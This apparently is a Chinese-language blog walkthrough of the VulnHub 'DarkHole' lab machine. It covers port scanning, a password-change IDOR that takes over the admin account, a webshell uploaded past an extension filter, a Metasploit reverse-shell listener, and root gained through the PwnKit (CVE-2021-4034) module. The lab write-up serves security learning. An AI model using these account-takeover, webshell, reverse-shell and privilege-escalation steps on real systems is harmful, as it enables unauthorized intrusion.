DarkHole

靶机说明

https://www.vulnhub.com/entry/darkhole-1,724

主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap -sn 192.168.1.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:45 CST
Nmap scan report for 192.168.1.1
Host is up (0.00035s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00053s latency).
MAC Address: 00:50:56:E8:96:F1 (VMware)
Nmap scan report for 192.168.1.4
Host is up (0.00052s latency).
MAC Address: 00:0C:29:61:27:92 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00028s latency).
MAC Address: 00:50:56:EF:22:46 (VMware)
Nmap scan report for 192.168.1.5
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.04 seconds

nmap扫描

(1)进行端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap -sT --min-rate 10000 -p- 192.168.1.4 -oA nmapscan/ports                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:46 CST
Nmap scan report for 192.168.1.4
Host is up (0.0058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:61:27:92 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds
  • 开放端口22和80
    (2)对端口细节进行扫描
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    ┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
    └─$ sudo nmap -sT -sV -O --min-rate 10000 -p22,80 192.168.1.4 -oA nmapscan/detail
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:47 CST
    Nmap scan report for 192.168.1.4
    Host is up (0.0029s latency).

    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    MAC Address: 00:0C:29:61:27:92 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 4.X|5.X
    OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
    OS details: Linux 4.15 - 5.8
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 7.63 seconds

(3)进行UDP扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap -sU -p22,80 192.168.1.4 -oA nmapscan/udp                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:48 CST
Nmap scan report for 192.168.1.4
Host is up (0.00033s latency).

PORT   STATE  SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:61:27:92 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

(4)进行漏洞扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo nmap --script=vuln -p22,80 192.168.1.4 -oA nmapscan/vuln      
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-08 19:48 CST
Nmap scan report for 192.168.1.4
Host is up (0.00049s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       httponly flag not set
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.4
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.1.4:80/login.php
|     Form id: login__username
|     Form action: login.php
|     
|     Path: http://192.168.1.4:80/register.php
|     Form id: login__username
|_    Form action: 
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /login.php: Possible admin folder
|   /config/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
MAC Address: 00:0C:29:61:27:92 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.21 seconds

web渗透

80端口渗透

(1)进行目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[/miao/vulnhub/Darkhole]
└─$ sudo gobuster dir -u http://192.168.1.4 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x html,php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.4
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 276]
/.php                 (Status: 403) [Size: 276]
/index.php            (Status: 200) [Size: 810]
/login.php            (Status: 200) [Size: 2507]
/register.php         (Status: 200) [Size: 2886]
/upload               (Status: 301) [Size: 311] [--> http://192.168.1.4/upload/]
/css                  (Status: 301) [Size: 308] [--> http://192.168.1.4/css/]
/js                   (Status: 301) [Size: 307] [--> http://192.168.1.4/js/]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/config               (Status: 301) [Size: 311] [--> http://192.168.1.4/config/]
/dashboard.php        (Status: 200) [Size: 21]
/.php                 (Status: 403) [Size: 276]
/.html                (Status: 403) [Size: 276]
/server-status        (Status: 403) [Size: 276]
Progress: 830572 / 830576 (100.00%)
===============================================================
Finished
===============================================================

(2)访问80端口,存在一个登录页面

web逻辑漏洞

(1)注册一个新用户,进行登录,发现可以更改用户的密码

(2)进行抓包,查看修改密码的数据包,发现有id标识

(3)尝试将id修改为1

(4)尝试进行登录,成功进行登录,登录后存在一个文件上传的功能

(5)进行文件上传,尝试上传一个webshell,提示只允许jpg,png,gif上传

(6)经过尝试,最后将文件的后缀修改为.phmtl,即可成功进行上传

(7)使用哥斯拉进行连接,成功进入

(8)由于哥斯拉里面的shell,不属于稳定的shell,所以需要反弹一个稳定的shell

  • 使用哥斯拉中的PMeterpreter进行反弹shell

  • 开启监听

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    msf6 > use exploit/multi/handler
    [*] Using configured payload generic/shell_reverse_tcp
    msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf6 exploit(multi/handler) > set lhost 0.0.0.0
    lhost => 0.0.0.0
    msf6 exploit(multi/handler) > set lport 4444
    lport => 4444
    msf6 exploit(multi/handler) > run

    [*] Started reverse TCP handler on 0.0.0.0:4444 
    [*] Sending stage (39927 bytes) to 192.168.1.4
    [*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.4:37968) at 2025-02-08 22:47:24 +0800

    meterpreter >

提权-pwnkit

(1)使用脚本linux-exploit-suggester.sh查看哪些可以进行提权,将脚本上传至临时目录

1
2
3
4
5
meterpreter > upload /miao/vulnhub/lampiao/linux-exploit-suggester.sh /tmp/1.sh
[*] Uploading  : /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Uploaded -1.00 B of 88.80 KiB (-0.0%): /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
[*] Completed  : /miao/vulnhub/lampiao/linux-exploit-suggester.sh -> /tmp/1.sh
meterpreter >

(2)执行脚本,查看可以用什么方式进行提权

1
2
3
4
5
6
7
8
meterpreter > shell
Process 10161 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
cd /tmp
chmod +x 1.sh
./1.sh

(3)找到cve_2021_4034的漏洞利用

(4)使用msf,寻找漏洞利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search cve_2021_4034

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec  2022-01-25       excellent  Yes    Local Privilege Escalation in polkits pkexec
   1    \_ target: x86_64                                  .              
   2    \_ target: x86                                     .    
   3    \_ target: aarch64                                 .              

Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                                                                                           
After interacting with a module you can manually set a TARGET with set TARGET 'aarch64'

(5)找到一个可利用的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions 

Active sessions
===============

  Id  Name  Type                   Information          Connection
  --  ----  ----                   -----------          ----------
  1         meterpreter php/linux  www-data @ darkhole  192.168.1.5:4444 -> 192.168.1.4:37968 (192.168.1.4
                                                        )

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[*] Started reverse TCP handler on 192.168.1.5:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.dhoapptcyi
[+] The target is vulnerable.
[*] Writing '/tmp/.bhwmihxok/xtkbwpd/xtkbwpd.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.bhwmihxok
[*] Sending stage (3045380 bytes) to 192.168.1.4
[+] Deleted /tmp/.bhwmihxok/xtkbwpd/xtkbwpd.so
[+] Deleted /tmp/.bhwmihxok/.jqyjmbhdcuu
[+] Deleted /tmp/.bhwmihxok
[*] Meterpreter session 2 opened (192.168.1.5:4444 -> 192.168.1.4:37970) at 2025-02-08 23:00:06 +0800
meterpreter >

(6)成功提权到root

1
2
meterpreter > getuid
Server username: root

读取flag

1
2
3
4
5
meterpreter > shell
Process 12372 created.
Channel 1 created.
cat /root/root.txt
DarkHole{You_Are_Legend}

总结

(1)哥斯拉可以使用模块PMeterpreter进行反弹shell
(2)Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权进程通信提供了一种有组织的方式。也可以使用 polkit 执行具有提升权限的命令,使用命令 pkexec 后跟要执行的命令(具有 root 权限)。

Vulnhub
#文件上传 #提权-pwnkit
DarkHole
http://miao-sec.github.io/Vulnhub/DarkHole/
作者
Miao
发布于
2025年6月20日
许可协议
BY-MIAO